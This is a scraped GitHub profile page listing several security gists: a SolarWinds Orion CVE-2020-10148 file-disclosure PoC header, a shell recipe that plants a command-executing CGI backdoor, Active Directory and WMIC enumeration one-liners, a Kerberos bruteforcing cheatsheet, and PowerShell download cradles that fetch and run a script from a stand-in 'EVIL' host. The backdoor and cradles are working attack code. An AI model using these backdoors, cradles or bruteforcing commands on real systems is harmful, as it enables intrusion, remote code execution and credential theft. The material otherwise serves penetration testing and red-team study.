Skip to content

Instantly share code, notes, and snippets.

View PfiatDe's full-sized avatar

PfiatDe PfiatDe

32 followers · 11 following
View GitHub Profile
@0xsha
0xsha / Solarwinds_Orion_LFD.py
Last active September 24, 2024 05:28
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020 0xSha.io
# Advisory : https://www.solarwinds.com/securityadvisory
# Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip
# Details : https://kb.cert.org/vuls/id/843464
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
@MarkBaggett
MarkBaggett / gist:38dcff6a0975f148aa858e924d64c492
Created November 14, 2020 18:22
http.server cgi backdoor
cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi
python -m http.server --cgi
@w00tc
w00tc / 1) Active Directory One Liners
Last active August 19, 2024 22:56
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
@heywoodlh
heywoodlh / maderas.txt
Created June 19, 2019 15:47
Clone of the arsenal, armory & library by Maderas (@hackermaderas) -- https://pastebin.com/v8Mr2k95
The arsenal, armory & library by Maderas (@hackermaderas, #CyberpunkisNow) 6/8/2019
Original / 1st version here: https://pastebin.com/rMw4WbhX
___________________________________________________________________________________
# Basic knowledge requirements for Red Teaming, PenTesting, Hacking & Cybersecurity
# These are the basic competencies expected (and tested for during the in-person technical interview) by one of the largest, most visible InfoSec companies # on Earth.
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xorrior
xorrior / wmic_cmds.txt
Last active April 16, 2025 01:36
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 23, 2025 13:28
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object